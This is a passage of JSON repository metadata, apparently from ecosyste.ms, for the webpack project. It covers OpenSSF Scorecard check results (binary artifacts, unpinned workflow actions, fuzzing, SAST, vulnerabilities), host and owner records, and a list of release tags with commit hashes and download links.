test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parse